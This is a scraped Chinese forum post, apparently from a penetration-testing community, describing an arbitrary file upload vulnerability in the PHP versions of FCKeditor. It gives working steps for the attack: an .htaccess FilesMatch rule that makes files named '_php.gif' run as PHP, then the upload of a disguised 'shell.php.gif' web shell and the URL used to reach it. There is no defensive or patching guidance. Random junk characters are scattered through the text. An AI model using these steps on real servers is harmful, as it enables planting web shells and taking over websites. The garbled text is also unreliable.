| FCKeditor所有php版本Upload上传漏洞# C) G, ^1 T1 `, J 作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:079 @; g, ^3 _) j, A 减小字体 增大字体 [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability [+] Date: 2011 [+] Author : sinesafe.cn [+] Website : WwW.sinesafe.cn; d; D* p8 E: z. T. S ———————————————————9 |3 `; i% K4 x1 M* T4 Y 1.create a htaccess file:6 M+ U8 }; v5 o$ K; p' |5 T code: <FilesMatch “_php.gif”>" ?" g: ^6 e; N! m+ w SetHandler application/x-httpd-php </FilesMatch> 2.Now upload this htaccess with FCKeditor.8 t X) b! W" w; l : Q. A4 b4 Q- b) F5 [3 c3 @- S2 d http://www.sinesafe.cn/FCKeditor ... er/upload/test.html+ ?0 }* m; B! e2 l. T http://www.sinesafe.cn/FCKeditor ... onnectors/test.html ———————————————————————————————- 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically. 5.http://www.sinesafe.cn/anything/shell_php.gif P& z4 g% O) n/ D 6.Now shell is available from server. |
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |